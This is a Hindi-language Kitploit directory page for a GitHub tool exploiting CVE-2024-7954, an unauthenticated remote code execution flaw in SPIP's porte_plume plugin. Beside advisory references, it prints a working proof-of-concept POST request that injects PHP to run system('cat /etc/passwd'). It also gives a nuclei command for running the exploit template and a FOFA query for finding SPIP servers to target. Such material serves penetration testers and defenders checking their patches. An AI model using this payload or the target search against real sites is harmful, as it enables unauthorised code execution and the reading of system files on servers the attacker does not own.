Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-7954-RCE — SPIP संस्करण 4.2.12 तक और इसमें शामिल सभी संस्करणों में प्रमाणीकरण रहित दूरस्थ कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/gh-ost00/cve-2024-7954-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubgh-ost00/cve-2024-7954-rce

CVE-2024-7954-RCE

SPIP संस्करण 4.2.12 तक और इसमें शामिल सभी संस्करणों में प्रमाणीकरण रहित दूरस्थ कोड निष्पादन

रिपॉजिटरी देखें
921 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विवरण

SPIP द्वारा 4.30-alpha2, 4.2.13, और 4.1.16 से पहले उपयोग किया जाने वाला porte_plume प्लगइन एक मनमाना कोड निष्पादन भेद्यता के लिए संवेदनशील है। एक दूरस्थ और अप्रमाणित हमलावर एक क्राफ्टेड HTTP अनुरोध भेजकर SPIP उपयोगकर्ता के रूप में मनमाना PHP निष्पादित कर सकता है।

शोषण (अवधारणा का प्रमाण)

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

उपयोग

root@kitploit:~
nuclei --target {host.com} -t CVE-2024-7954.yaml

FOFA क्वेरी

root@kitploit:~
app="SPIP"

संदर्भ

  • https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html
  • https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather/
  • https://vulncheck.com/advisories/spip-porte-plume
  • https://nvd.nist.gov/vuln/detail/CVE-2024-7954
  • https://security-tracker.debian.org/tracker/CVE-2024-7954
टूल डाउनलोड करें